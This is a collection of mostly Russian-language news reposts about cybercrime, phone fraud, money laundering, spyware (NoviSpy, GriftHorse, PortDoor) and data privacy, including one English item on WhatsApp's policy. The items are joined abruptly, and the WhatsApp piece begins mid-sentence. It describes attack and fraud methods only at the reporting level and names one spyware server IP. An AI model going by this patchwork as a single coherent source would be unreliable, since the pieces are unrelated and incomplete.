С учетом позиции гособвинителя и представленных им доказательств суд Ленинского района Гродно постановил обвинительный приговор. На основании ч.4 ст.209 и ч.4 ст.212 УК двоим обвиняемым назначено наказание в виде лишения свободы на срок 6 и 8 лет с отбыванием в исправительной колонии в условиях усиленного режима со штрафом в размере 250 и 400 БВ (Br8 тыс. и Br12,8 тыс.) соответственно. Третьему обвиняемому по ч.2 ст.212 УК назначено наказание в виде ограничения свободы без направления в исправительное учреждение открытого типа на срок два года.
Суд также удовлетворил иски потерпевших о возмещении причиненного им имущественного ущерба.
Приговор в законную силу не вступил, может быть обжалован и опротестован в апелляционном порядке.
privacy policy update that requires sharing data with other companies owned by Facebook.
WhatsApp on Friday announced that it will not deactivate accounts of users who don’t accept its new privacy policy that will be rolled out on May 15.
The company will only continue to remind its users to accept the new privacy policy.
[](https://i2.wp.com/securityaffairs.co/wordpress/wp-
content/uploads/2021/05/WhatsApp-persistent-reminders.png?ssl=1)
“No one will have their accounts deleted or lose functionality of WhatsApp on
May 15 because of this update,”[reads the FAQ page set up by
WhatsApp](https://faq.whatsapp.com/general/security-and-privacy/what-happens-
when-our-terms-and-privacy-policy-updates-take-effect/?lang=en). “For the last
several weeks we’ve displayed a notification in WhatsApp providing more
information about the update. After giving everyone time to review, we’re
continuing to remind those who haven’t had the chance to do so to review and
accept. After a period of several weeks, the reminder people receive will
eventually become persistent.”
The company will limit the functionality of the instant messaging app until its users accept the updates, WhatsApp revealed that this will not happen to all users at the same time.
In January, WhatsApp [started notifying](https://securityaffairs.co/wordpress/113094/digital-id/whatsapp- shares-data-facebook.html) users that starting February 8, 2021, they will be obliged to share their data with Facebook, leaving them no choice. The use raised a heated debate on the way Facebook takes care of the privacy of its users. The news raised a heated debate on the way Facebook takes care of the privacy of its users, millions of users have chosen to leave the app and migrate to the privacy-friendly app Signal.
Once the new policy will be effective, users will not be able to access their chat list, but they will still be able to answer incoming phone and video calls. After a few weeks of limited functionality, users won’t be able to receive incoming calls or notifications and WhatsApp will stop sending messages and calls to their mobile device.
“You won’t be able to access your chat list, but you can still answer incoming phone and video calls. If you have notifications enabled, you can tap on them to read or respond to a message or call back a missed phone or video call.” continues WhatsApp. “After a few weeks of limited functionality, you won’t be able to receive incoming calls or notifications and WhatsApp will stop sending messages and calls to your phone.”
WhatsApp pointed out that the update does not expand on its ability to share user data (i.e. chats) with Facebook companies.
В Минске задержали очередного дропа. Об этом БЕЛТА сообщили в ГУВД Мингорисполкома.
Столичные оперативники за незаконный оборот платежных средств задержали 23-летнего минчанина. Оказалось, что молодой человек в одном из мессенджеров нашел предложение о быстром заработке. Суть проста: оформить банковскую карту и передать ее реквизиты за вознаграждение.
Минчанин безропотно выполнил инструкции и оформил на себя три банковские карты, после чего передал их незнакомцам. За это молодой человек получил Br300.
"Минчанин позднее признался, что у него возникли сомнения в законности такого заработка, однако кураторы убедили его в обратном", - добавили в милиции.
Возбуждено уголовное дело.
Европейские правоохранительные органы недавно провели успешную совместную операцию по закрытию 12 колл-центров, специализирующихся на телефонном мошенничестве. Операция прошла 18 апреля при участии сотен сотрудников правоохранительных органов из Германии, Албании, Боснии и Герцеговины, Косово и Ливана. В ходе рейдов были идентифицированы 39 подозреваемых, 21 из которых успешно задержаны.
В результате операции конфискованы документы, наличные и другие активы на сумму около 1 миллиона евро. Также удалось изъять важные электронные данные, которые, как ожидается, помогут выявить другие подобные колл-центры и участников мошеннических схем.
Европол отмечает, что задержанные лица использовали различные методы обмана, включая фальшивые звонки от полиции, инвестиционные аферы и романтические мошенничества. Операция, получившая название «Пандора», началась в декабре 2023 года после того, как банковский сотрудник в городе Фрайбург, Германия, заметил подозрительные действия одного из клиентов.
Расследование показало, что номера телефонов задержанных фигурировали в более чем 28 000 мошеннических звонках за 48 часов. Полиция также в режиме реального времени мониторила разговоры в данных колл-центрах, что позволило перехватить более 1,3 миллиона бесед и пресечь около 80% попыток финансового мошенничества.
В результате этих мер было предотвращено причинение ущерба на сумму свыше 10 миллионов евро. Мошенники выдавали себя за близких родственников, сотрудников банков или службы поддержки, используя различные манипулятивные тактики.
В прошлом году Европолом также было проведено несколько схожих операций. Об одной из таких мы писали в январе, о другой в ноябре, но на деле подобных операций было ещё больше.
Одной из крупнейших подобных операций стал полицейский рейд, проведённый в марте 2022 года. Тогда Европол сообщил о ликвидации крупной схемы мошенничества с инвестиционными колл-центрами, где 200 так называемых «трейдеров» ежемесячно обманывали жертв на сумму не менее 3 миллионов евро. В ходе операции были арестованы 108 подозреваемых в Латвии и Литве.
sc: europol.europa.eu/media-press/newsroom/news/operation-pandora-shuts- down-12-phone-fraud-call-centres
В России создали нейросеть, которая способна деанонимизировать владельцев Telegram-каналов. Система получила название «Товарищ майор» и сейчас проходит внутреннее тестирование в компании-разработчике T.Hunter. Об этом сообщили «Известиям» () в пресс-службе Национальной технологической инициативы.
Как заявила пресс-служба НТИ, система «Товарищ майор» может исследовать сообщества в мессенджере и идентифицировать администраторов и владельцев пабликов. Нейросеть получает сведения об администраторах из описания канала, его архивных копий, постов, а также собирает метаданные опубликованных файлов. Полноценную версию программы планируют выпустить в 2024–2025 годах.
каналов ](https://iz.ru/1622822/ivan-chernousov/ii-tut-i-tam-v-rf-sozdali- soft-dlia-opredeleniia-vladeltcev-telegram-kanalov)
Сможет ли нейросеть «Товарищ майор» заменить аналитиков по поиску информации
 iz.ru
Разработчики менеджера паролей NordPass уже подводят итоги года и опубликовали традиционный список наиболее распространенных и слабых паролей. Хотя в этом году пароль «password» утратил пальму первенства и занимает лишь седьмое место по популярности, ему на смену пришли «123456», «admin» и «12345678», которые теперь возглавляют список.
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/oldlists.png)Худшие пароли прошлых лет
Для составления списка худших паролей 2023 года исследователи изучили 4,3 ТБ
данных, предоставленных независимыми исследователями, специализирующимися на
расследовании киберинцидентов. Эта информация была получена из различных
открытых источников, в том числе в даркнете.
Также было изучено 6,6 ТБ данных, среди которых были пароли, украденные различными инфостилерами, включая Redline, Vidar, Taurus, Raccoon, Azorult и Cryptbot. Это позволило экспертам классифицировать самые распространенные пароли по типам платформ, так как логи стилеров содержат множество различных данных.
В итоге самым распространенным паролем 2023 года стал «123456». Также в первую десятку вошли «admin», «12345678», «123456789» и неустаревающий «password». На взлом таких паролей потребуется менее одной секунды.
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/2023.png)Худшие пароли 2023 года
В целом строки последовательных чисел (от четырех до десяти символов), как
правило, занимают первые места в списках худших паролей во всех областях и
категориях. И практически также часто встречается пароль «UNKNOWN», на взлом
которого требуется уже целых 17 минут.
В отчете отмечается, что самые слабые пароли были обнаружены у пользователей стриминговых сервисов, которые пренебрегают надежными учеными данными гораздо чаще, чем пользователи других платформ.
Ниже можно увидеть списки самых распространенных паролей по категориям, включая электронную коммерцию, социальные сети, финансы, электронную почту, игры, решения для повышения производительности, смартфоны и стриминги.
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/1.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/2.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/3.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/4.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/5.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/6.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/7.png)
[](https://xakep.ru/wp-
content/uploads/2023/11/442368/8.png)
«Драмкружок, кружок по фото, мне еще и петь охота», — справляться со множеством задач детей приучают с пеленок. И если еще в школьные годы помимо школы можно было успевать посещаться занятия в художественной или музыкальной, то уже во взрослом возрасте обычно все сводится к наличию одной работы. Какая там подработка!
Click to expand...
Китаянка Гуань Юэ ради голубой мечты решила устроиться аж на 16 работ одновременно. Но не все так просто. Чтобы совмещать сразу несколько позиций, женщина разработала целую схему. По факту, ни на одной из своих работ Гуань не протрудилась и дня. Она делала снимки в различных местах, скидывая их в рабочие группы, утверждая, что встречается с клиентами.
Карьера великой аферистки Гуань Юэ закончилась, когда ее арестовали во время очередного собеседования при приеме на работу. Незадолго до этого один из работодателей, владелец IT-компании Лю Цзянь, обнаружил неточности в документах. В октябре прошлого года он собрал отдел из семи человек, каждый мог похвастаться идеальным резюме и колоссальным опытом работы. Но несмотря на это, результатов отдел не показал и был увален. После этого Лю обнаружил в документах неточности. Он заметил поток подозрительных средств, перечисленных в качестве зарплаты, в размере от тысяч до десятков тысяч юаней, на различные банковские счета, которые не имели отношения к его сотрудникам. Полиция, подключившаяся к расследованию, установила, что вместе с Гуань Юэ мошенничеством промышляли 53 человека. Все они арестованы. Общая сумма по делу превысила 50 млн юаней ($7 млн).
Следствие установила, что Гуань подходила к своей афере основательно, учитывая каждую деталь. Чтобы не запутаться в работодателях, китаянка все документировала. Записывала даты начала работы, названия должностей и номера банковских счет, куда поступала зарплата. Гуань обладала уникальным талантом продавать себя работодателям, поэтому отбоя от предложений у нее не было. Понимая, что объять необъятное невозможно, она время от времени даже продавала выгодные вакансии, получая за это процент.
По криминальной дорожке китаянка шла рука об руку с мужем Чэнь Цяном. За три года реализации мошеннической схемы пара накопила достаточно, чтобы купить себе виллу в районе Баошань в Шанхае. Во сколько им обошлась недвижимость, не сообщается.
В китайских социальных сетях эта история удивила и шокировала пользователей. Однако некоторые усомнились в том, что Гуань Юэ на протяжении такого длительного времени с легкостью водила за нос столько работодателей. Другие выступили за то, чтобы в Китае ужесточили правила приема на работу.
На часть похищенных средств хакер купил автомобиль BMW i8 стоимостью около $150 тыс.
Минюст США обвинил молодого американца и его сообщников в краже криптовалют у сотрудников компаний из Силиконовой долины, сообщает Decrypt со ссылкой на документы суда.
Хакер Ахмад Вагаафе Харед украл в период с 2016 (тогда ему было 18 лет) по 2018 год биткоины (BTC) на общую сумму $5,2 млн. Эти средства сейчас пытается взыскать ведомство, говорится в публикации.
Для кражи криптовалют мошенник использовал схему подмены СИМ-карт (так называемый СИМ-свопинг). В обвинительном заявлении говорится, что хакеры звонили некоторым жертвам уже после того, как получили контроль над счетами в целях повторного вымогательства, уточняет издание.
source: decrypt.co/155747/doj-demands-5-million-in-bitcoin-and-bmw-sports-car- from-teen-hacker
Аналитики Check Point [обнаружили](https://research.checkpoint.com/2023/beyond-the-horizon- traveling-the-world-on-camaro-dragons-usb-flash-drives/), что неназванная европейская больница оказалась случайно заражена вредоносным ПО. Исследователи связывают это с неконтролируемым распространением малвари китайской хак-группы Camaro Dragon (она же Mustang Panda, BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta и Red Lich) через USB-накопители.
Отчет компании гласит, что обычно Camaro Dragon атакует цели в странах Азии, и в коде малвари группировки можно найти функции, предназначенные для уклонения от SmadAV, популярного в регионе антивирусного решения. Однако вредоносное ПО WispRider и HopperTick проникло в европейскую больницу, а также встречалось исследователям в Мьянме, Южной Корее, Великобритании, Индии и России.
«”Нулевой пациент” в этом инциденте был идентифицирован как сотрудник больницы, участвовавший в конференции в Азии, — рассказывают исследователи. — Он поделился своей презентацией с другими участниками мероприятия, используя USB-накопитель. К сожалению, у одного из его коллег оказался зараженный компьютер, и в результате собственный USB-накопитель [жертвы] так же был заражен. Вернувшись в родную больницу в Европе, сотрудник подключил зараженный USB-накопитель к компьютерным системам больницы, что привело к распространению заражения».
Click to expand...
В Checkpoint полагают, что атака начинается с того, что жертва запускает
вредоносный лаунчер, написанный на Delphi, на зараженном USB-накопителе. Это
приводит к запуску основной полезной нагрузки, которая загружает вредоносное
ПО на другие накопители, когда они подключаются к зараженной машине. При этом
подчеркивается, что малварь представляет большую опасность для корпоративных
систем, так как зараженные машины устанавливают вредонса на любые вновь
подключенные сетевые диски, а не на диски, уже подключенные к машине на момент
заражения.

Исследователи уверены, что распространение на недавно подключенные сетевые
накопители происходит непреднамеренно.
«Хотя сетевые диски, зараженные таким образом, теоретически могут использоваться как средство для бокового перемещения внутри той же сети, такое поведение скорее кажется ошибкой, чем умышленно добавленной функцией, — пишут исследователи. — Управление многочисленными файлами и замена их исполняемым файлом со значком флэш-накопителя USB на сетевых дисках — заметное действие, которое может привлечь к атаке дополнительное и нежелательное внимание».
Click to expand...
Если вредоносный код все же запускается, он пытается распространять бэкдор и похитить данные. Из-за этого случайное заражение сетевых хранилищ становится серьезной проблемой, ведь во многих организациях именно там хранятся важные данные.
Еще одна неприятная особенность этой малвари заключается в том, что она «выполняет DLL-side-loading с использованием компонентов защитного ПО, включая G-DATA Total Security, и продуктов двух крупных игровых компаний (Electronic Arts и Riot Games)». Checkpoint сообщает, что уже предупредила разработчиков об их невольном участии во вредоносных компаниях Camaro Dragon.
«Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России пресекли деятельность подозреваемых в пособничестве телефонным мошенникам с Украины. Задержаны пятеро жителей столичного региона, которые обеспечивали работу специального оборудования для подмены телефонных номеров», - сообщила официальный представитель МВД России Ирина Волк.
Предварительно установлено, что злоумышленники действовали по заданию зарубежных работодателей. Следуя получаемым указаниям, они приобретали GSM- шлюзы и активировали SIM-карты операторов сотовой связи. Это позволяло менять телефонный номер звонившего из-за границы афериста на российский и при этом соблюдать анонимность. В случае блокировки одной из SIM-карт ее меняли на новую.
«Пользователями этих услуг были мошенники, которые звонили гражданам и представлялись сотрудниками банков или правоохранительных органов. При этом убеждали собеседников в том, что с их банковских счетов пытаются похитить деньги. А чтобы этого избежать, нужно перевести средства на так называемые безопасные счета, которые в действительности находились под контролем преступников.
Сотрудники УБК МВД России и их коллеги из Московского уголовного розыска установили места, в которых находилось оборудование для удаленного использования абонентских номеров. В рамках сопровождения уголовных дел о мошенничестве в четырех квартирах в городах Москве, Дмитрове и Красногорске проведены обыски. Изъято более десяти тысяч SIM-карт различных операторов сотовой связи, GSM-шлюзы, модемы, компьютерная техника и другое оборудование»,
Следователями территориальных органов внутренних дел задержанным предъявлены обвинения в преступлениях, предусмотренных статьей 159 УК РФ.
Эксперты Zimperium [обнаружили](https://blog.zimperium.com/grifthorse-android- trojan-steals-millions-from-over-10-million-victims- globally/#:~:text=Indicators%20of%20Compromise) вредоноса GriftHorse, нацеленного на Android. Малварь активна с ноября 2020 года и подписывает своих жертв на платные SMS-сервисы. Она уже заразила более 10 млн устройств в 70 странах мира, и считается, что операторы GriftHorse «зарабатывают» от 1,5 до 4 млн долларов в месяц.
Замеченные экспертами версии GriftHorse распространялись через официальный магазин приложений Google Play и сторонние каталоги приложений, как правило, маскируясь под другие безобидные приложения.
Если пользователь устанавливает такое приложение, GriftHorse начинает засыпать его всплывающими окнами и уведомлениями, в которых предлагает различные призы и специальные предложения. Если жертва нажимает на одно из таких уведомлений, ее перенаправляют на страницу, где просят подтвердить номер телефона, якобы чтобы получить доступ к предложению. На самом деле здесь пользователи подписываются на платные SMS-сервисы, стоимость которых порой превышает 30 евро в месяц. Эти деньги в итоге отправляются в карманы операторов GriftHorse.
Исследователи Zimperium, которые отслеживали малварь в течение нескольких месяцев, пишут, что это «одна из самых масштабных кампаний, свидетелями которых была команда zLabs в 2021 году».
Подчеркивается, что создатели GriftHorse хорошо потрудились над качеством своего вредоносного кода, и используют широкий спектр сайтов, вредоносных приложений и личностей разработчиков, чтобы избегать обнаружения.
«Уровень изощренности, использование новых техник и решимость, которую демонстрируют злоумышленниками, позволяли им оставаться незамеченными в течение нескольких месяцев. Помимо использования большого количества приложений, их распространение было очень хорошо спланировано: приложения распределялись по множеству различных категорий, расширяя круг потенциальных жертв, — пишут эксперты. — Эта кампания активно разрабатывалась в течение нескольких месяцев, начиная с ноября 2020 года, а последнее обновление датировано апрелем 2021 года. Это означает, что одна из их первых жертв, если она еще не отключила мошенническую подписку, уже потеряла более 200 евро на момент написания [этого отчета]».
Список, в который входят более 200 приложений, зараженных GrifThorse, можно найти в конце [отчета](https://blog.zimperium.com/grifthorse-android-trojan- steals-millions-from-over-10-million-victims-globally/) исследователей.
Хакеры отправили главе конструкторского бюро «Рубин» фишинговое письмо, доставляющее на систему ранее неизвестный бэкдор.
Предположительно работающая на китайское правительство киберпреступная группа атаковала российское оборонное предприятие, занимающееся разработкой атомных подводных лодок для военно-морского флота РФ.
Фишинговое письмо, отправленное злоумышленниками генеральному директору санкт- петербургского конструкторского бюро «Рубин», использовало инструмент для создания RTF-эксплоитов Royal Road для доставки на атакуемую систему ранее неизвестного бэкдора для Windows под названием PortDoor.
По словам специалистов команды Nocturnus ИБ-компании Cybereason, PortDoor имеет широкий функционал и способен осуществлять разведку, профилировать цели, доставлять дополнительную полезную нагрузку, повышать привилегии, обходить антивирусное ПО, использовать однобайтовое шифрование XOR, извлекать данные, зашифрованные с использованием стандарта AES, и пр.
В течение многих лет Royal Road является излюбленным инструментом целого ряда китайских хакерских группировок, в частности Goblin Panda, Rancor Group, TA428, Tick и Tonto Team, которые используют его в целенаправленных фишинговых атаках с конца 2018 года. Злоумышленники эксплуатируют уязвимости в Microsoft Equation Editor ( CVE-2017-11882 , CVE-2018-0798 и CVE-2018-0802 ) и используют вредоносные RTF-документы для доставки кастомного вредоносного ПО на системы ничего не подозревающих жертв.
Такой же тактики хакеры придерживались и в недавней атаке на гендиректора конструкторского бюро «Рубин» – главным вектором заражения были фишинговые письма. Тем не менее, если предыдущие версии Royal Road доставляли зашифрованную полезную нагрузку под названием «8.t», то в этот раз письмо содержало вредоносный документ, доставляющий при открытии зашифрованный файл с именем «eo» для извлечения импланта PortDoor. То есть, злоумышленники воспользовались новыми инструментами.
«Вектор заражения, стиль социальной инженерии, использование RoyalRoad в атаках на аналогичные цели и сходства между недавно обнаруженным бэкдором и другим известным вредоносным ПО китайских APT – все это указывает на злоумышленников, действующих в государственных интересах Китая», – сообщили исследователи.
Центральное конструкторское бюро морской техники «Рубин» – одно из ведущих советских и российских предприятий в области проектирования подводных лодок, как дизель-электрических, так и атомных.
Сербские власти неоднократно использовали инструменты компании Cellebrite для взлома мобильных телефонов, чтобы затем заразить их мощным вредоносным программным обеспечением, включая устройства активистов и одного журналиста, говорится в новом отчёте правозащитной организации Amnesty International.
Этот отчёт важен, поскольку демонстрирует, что хотя устройства Cellebrite обычно предназначены для взлома или извлечения данных с телефонов, к которым у властей есть физический доступ, они также могут использоваться для последующей установки активных систем слежки. В ряде случаев телефоны заражались вредоносным ПО, а затем возвращались их владельцам. Amnesty также сообщает, что совместно с исследователями Google обнаружила уязвимость, распространённую среди множества Android-телефонов, которую Cellebrite использовала в своих целях. Компания Qualcomm, чьи чипы были затронуты, уже устранила эту уязвимость. Кроме того, по словам Amnesty, Google дистанционно удалила шпионское ПО с заражённых устройств.
«Меня беспокоит поведение полиции во время инцидента, особенно то, как они изъяли/извлекли данные с моего мобильного телефона без соблюдения законных процедур. Тот факт, что они извлекли 1,6 ГБ данных с моего телефона, включая личную, семейную и деловую информацию, а также сведения о наших коллегах и людях, выступающих в роли "источников информации" для журналистских расследований, просто неприемлем», — заявил 404 Media заместитель редактора и журналист сербского издания FAR Славиша Миланов, чей телефон подвергся такому воздействию. Миланов, среди прочего, освещает коррупцию.
Cellebrite — израильская компания, продающая технологии мобильной криминалистики правоохранительным органам и частным компаниям по всему миру. Один из её основных продуктов — UFED, который может поставляться в формате устройства размером с планшет или программного обеспечения для ПК и способен предоставлять доступ к данным, хранящимся на мобильных телефонах. Инструменты Cellebrite часто могут обойти или перебрать пароль на телефоне, что позволяет правоохранителям получить к нему доступ без согласия владельца.
Amnesty сообщает, что её исследование основано на онлайн-интервью, а также на двух поездках в Сербию в сентябре и ноябре, в ходе которых организация опросила 28 представителей гражданского общества по всей стране. Кроме того, эксперты провели судебно-технический анализ телефонов, которые, по подозрению их владельцев, были заражены шпионским ПО или подверглись взлому и извлечению данных, а также изучили документы, связанные с передачей технологий Cellebrite сербским властям.
Расследование началось в 2021 году, когда Amnesty получила несколько сообщений от активистов и журналиста в Сербии о подозрительной активности на их мобильных телефонах после встреч с сербскими правоохранителями. По крайней мере в двух случаях люди обращались в полицию или встречались с представителями властей, чтобы сообщить о том, что стали жертвами преступления.
Amnesty утверждает, что при судебно-техническом анализе множества устройств
было обнаружено «новое, ранее не раскрытое шпионское ПО для Android», которое
Amnesty назвало NoviSpy. Руководитель лаборатории информационной безопасности
Amnesty, Доннха О’Кервайлл, сообщил 404 Media, что организация не знает, как
сербские власти называют это ПО, поэтому дала ему имя «Novi» («новый» по-
сербски).
Amnesty заявляет, что сербские власти либо сами разработали NoviSpy, либо
приобрели его. Полиция устанавливает NoviSpy на телефоны во время задержания,
допроса или ареста представителей гражданского общества, отмечает Amnesty. В
ряде случаев, по словам организации, подобные задержания или допросы, по-
видимому, были организованы специально с целью заразить устройство.
В случае с Милановым он рассказал 404 Media, что в феврале вместе с коллегой, главным редактором FAR Петаром Виденовым, ехал в город Пирот на юго-востоке Сербии. Около 10:50 утра их остановила дорожная полиция и потребовала удостоверения личности. По словам Миланова, полицейские одновременно разговаривали по телефону. Они заявили, что Миланову нужно «пройти проверку на психоактивные вещества».
В отделении полиции у Миланова потребовали выключить телефон Xiaomi Redmi Note 10S и сдать все личные вещи. Кроме телефона, Миланов отдал свой кошелёк, ключи и табак. По данным Amnesty, он не предоставил полиции код разблокировки телефона. Миланов говорит, что его проверили на алкоголь и наркотики, и оба теста дали отрицательный результат.
Спустя более часа после остановки, Миланов спросил у одного из полицейских: «Что происходит, мы закончили? Мне нужно ехать по делам в Пирот». Офицер ответил, что ждут «начальника», и вышел из комнаты, чтобы сделать несколько телефонных звонков. «В какой-то момент я слышу, как он говорит по телефону: "Он отрицательный, я больше не могу его удерживать"», — вспоминает Миланов. После этого ещё двое сотрудников в гражданской одежде допросили Миланова в другом здании о его журналистской деятельности и финансировании издания FAR, говорится в отчёте Amnesty. В конце концов власти вернули Миланову его вещи, и он был отпущен. Позже он заметил странности в работе своего телефона: отключенный мобильный интернет и Wi-Fi, а также аномально высокое потребление батареи некоторыми приложениями. По его словам, он воспользовался приложением Stay Free, отслеживающим активность телефона, которое показало, что многие приложения были активны, пока устройство находилось у полиции.
На тот момент Миланов не знал, что власти использовали инструмент Cellebrite для взлома его телефона, следует из судебно-технического анализа Amnesty. Анализ обнаружил на устройстве бинарный файл Cellebrite под названием «falcon». «Amnesty International полагает, что система Cellebrite UFED позволила сербским властям подобрать или обойти код блокировки телефона и установить на устройство шпионское ПО. Последующие следы файла Cellebrite falcon указывают на проведение извлечения данных при помощи UFED после первоначального взлома и установки NoviSpy», — говорится в отчёте. Amnesty отмечает, что нашла и другие случаи применения Cellebrite для разблокировки телефонов перед установкой NoviSpy.
NoviSpy представлен в виде двух приложений, которые власти устанавливают на
целевое устройство: «com.serv.services» и «com.accesibilityservice». Первое
может собирать журналы вызовов, контакты, текстовые сообщения и записывать
звук через микрофон телефона. Второе может незаметно делать скриншоты экрана,
отмечает Amnesty.
В одном случае исследователи Amnesty обнаружили, что проверяемый ими Samsung
Galaxy S24+ всё ещё был заражён, и им удалось восстановить логи слежки и
скриншоты, хранящиеся на устройстве. NoviSpy был настроен на отправку
украденных данных на сервер с IP-адресом 195.178.51.251, отмечает отчёт. Этот
IP-адрес входит в узкий диапазон, в котором Citizen Lab ранее выявляла систему
FinFisher в 2014 году. Публичный сервер с этим же IP имел имя компьютера
«DPRODAN-PC», говорится в отчёте Amnesty.
О’Кервайлл указал на электронное письмо из архива взлома итальянской компании Hacking Team (2015 год), отправленное кем-то из сербского госоператора связи, в котором обсуждалась демонстрация шпионского ПО с тем же именем, что и у ПК, связанного с NoviSpy. Конфигурационный файл NoviSpy также содержит номер телефона, связанный с человеком с таким же именем, отмечает Amnesty.
Среди сделанных скриншотов были зафиксированы сообщения в Signal и WhatsApp,
указывается в отчёте. Если устройство, являющееся одним из «концов» в системе
сквозного шифрования, заражено вредоносным ПО, то сообщения, которые в других
условиях были бы защищены от перехвата, могут стать доступными для
злоумышленников.
После того как Amnesty сообщила о NoviSpy в Google, Google смогла удалённо
удалить активные инфекции NoviSpy с других Android-устройств, говорится в
отчёте. Пресс-секретарь Google подтвердил, что компания сотрудничала с
Amnesty. О’Кервайлл отметил: «У меня нет окончательных цифр от Google
относительно количества удалённых или обнаруженных инфекций, но мы полагаем,
что эти атаки достаточно широко распространены».
Помимо прочего, Amnesty обнаружила уязвимость в Android-устройствах на чипах Qualcomm, затронувшую миллионы телефонов по всему миру. О’Кервайлл сказал, что Amnesty сначала заметила подозрительные строки в журнале ядра, вызванные бинарным файлом Cellebrite falcon. «Эксплойт несколько раз не сработал, и мы смогли увидеть логи от нескольких попыток взлома», — пояснил он. Amnesty заподозрила использование Android-уязвимости нулевого дня и сообщила об этом в Google, которая впоследствии выявила несколько таких уязвимостей. Qualcomm выпустила исправление в октябре 2024 года.
Сербия также потенциально является покупателем ряда систем удалённого шпионажа, таких как FinFisher, Predator и Pegasus от NSO Group.
В ответе Amnesty, включённом в отчёт, Виктор Купер, старший директор по корпоративным коммуникациям Cellebrite, заявил: «Мы выполняем ряд процедур комплексной проверки в области прав человека, прежде чем начать сотрудничество с правоохранительными органами любой страны, а также с другими оборонными или гражданскими ведомствами. У нас также есть независимый комитет по этике и порядочности, который руководит нашим подходом». Он добавил: «Решения цифровой криминалистики Cellebrite лицензируются исключительно для законного использования, требуют ордера или согласия и помогают правоохранительным органам в расследованиях после совершения преступления».
Купер предоставил тот же ответ 404 Media и добавил, что если информация Amnesty подтвердится в ходе расследования Cellebrite, это будет означать нарушение лицензионного соглашения с Сербией. После этого Cellebrite пересмотрит целесообразность дальнейшего сотрудничества с Сербией, являющейся одной из 100 стран-партнёров компании.
В другом заявлении для 404 Media Купер отметил: «Мы благодарны Amnesty International за то, что они обратили внимание на предполагаемое неправомерное использование нашей технологии. Мы серьёзно относимся ко всем обвинениям в возможном злоупотреблении нашими технологиями, противоречащими как прямым, так и подразумеваемым условиям нашего лицензионного соглашения. Мы расследуем утверждения, содержащиеся в этом отчёте. Если они подтвердятся, мы готовы ввести соответствующие санкции, включая прекращение отношений с любыми причастными ведомствами».
Источник:[https://www.404media.co/cellebrite-...sts-phone-cops-then-infected- it-with-malware/](https://www.404media.co/cellebrite-unlocked-this- journalists-phone-cops-then-infected-it-with-malware/)
Пресечена преступная деятельность группы граждан, которые отмывали деньги телефонных мошенников. Об этом БЕЛТА сообщили в Комитете государственного контроля.
Установлено, что в состав группы входили четверо жителей Брестской области. На протяжении 2022-2024 годов они занимались легализацией доходов, полученных преступным путем телефонными мошенниками, выманивавшими у граждан деньги под предлогом получения дохода от инвестирования в драгметаллы, газ, нефть, акции крупных компаний. Всего участники группы легализовали более Br4 млн.
Для отмывания преступных доходов участники группы открывали на подставных лиц в банках карт-счета, на которые обманутые граждане перечисляли деньги. Похищенные средства аккумулировались и на криптобиржах. За них приобреталась криптовалюта, которая впоследствии переводилась на кошельки телефонных мошенников. В качестве вознаграждения участники группы оставляли себе 5% от оборота.
Роли каждого из участников группы были четко распределены, а в самой их деятельности использовались серьезные меры конспирации. Так, количество открытых карт-счетов исчислялось сотнями, и они периодически менялись. Общение происходило через мессенджеры, использовались сим-карты как отечественных, так и зарубежных операторов.
За легализацию средств, полученных преступным путем, совершенную организованной группой, в отношении четверых жителей Брестской области возбуждено уголовное дело. Подозреваемые заключены под стражу. У них изъято 25 банковских пластиковых карточек, 42 сим-карты операторов мобильной связи Польши, России и Беларуси, семь единиц компьютерной техники и 16 мобильных телефонов, подтверждающих их преступную деятельность. В настоящее время принимаются меры по поиску имущества для погашения причиненного гражданам ущерба.
belta.by/regions/view/chetvero-zhitelej-brestskoj-oblasti-zaderzhany-za- otmyvanie-deneg-telefonnyh-moshennikov-669981-2024/?ysclid=m2lxqkl2lm975667614
Эстонская компания по обработке криптовалютных платежей, CoinsPaid, выяснила , как именно хакеры группы Lazarus из Северной Кореи, получили доступ к ее системам 23 июля. Тогда было украдено более $37 млн.
Используя подставных рекрутеров, якобы от других организаций, злоумышленники предлагали сотрудникам CoinsPaid работу. Самым привлекательным условием вакансии была заработная плата — от $16 000 до $24 000 в месяц.
Один из сотрудников согласился на онлайн-собеседование с «работодателем». В ходе интервью его попросили скачать специальное ПО и выполнить тестовое задание. Мужчина, по данным расследования, установил на своем ПК JumpCloud Agent или другую программу, содержащую вредоносные файлы. Сама платформа JumpCloud, вероятно, была также взломана хакерами в июле для целенаправленных атак на криптовалютные биржи.
Специалисты отмечают, что все действия Lazarus были тщательно спланированы. Они в течение полугода изучали CoinsPaid, собирая информацию о структуре и технических особенностях сервиса. Это объясняет, почему манипуляции выглядели крайне правдоподобно и не вызвали у жертвы никаких подозрений.
«Получив доступ к инфраструктуре CoinsPaid, злоумышленники использовали уязвимость системы в качестве бэкдора, — заявила CoinsPaid. «Знания, полученные на этапе исследования, позволили им отправлять запросы на взаимодействие с блокчейном и выводить средства из нашего операционного хранилища».
До атаки 23 июля хакеры неоднократно пытались проникнуть на платформу, начиная с марта 2023 года, но после нескольких неудачных попыток изменили свой подход. Основным методом выбрали социальную инженерию, сосредоточившись на отдельных работниках, а не на компании в целом.
CoinsPaid также сообщила, что сотрудничает с организацией по безопасности блокчейна Match Systems для отслеживания украденных средств. Уже известно, что большая часть криптовалюты была переведена на SwftSwap. По мнению экспертов, схема транзакций, которую используют преступники, аналогична действиям Lazarus в ходе взлома Atomic Wallet на сумму $35 млн в июне.
Злоумышленники в телефонных разговорах выпытывали данные банковских карт потерпевших, выдавая себя за работников банков или правоохранителей. Жертвами правонарушителей были граждане Израиля. Мошенническую схему разоблачили в ходе международной полицейской операции.
Противоправную деятельность организатора call-центра, 40-летнего гражданина Украины, разоблачили сотрудники Департамента киберполиции совместно со следственным управлением полиции Запорожской области, работниками Офиса Генерального прокурора и правоохранителями государства Израиль.
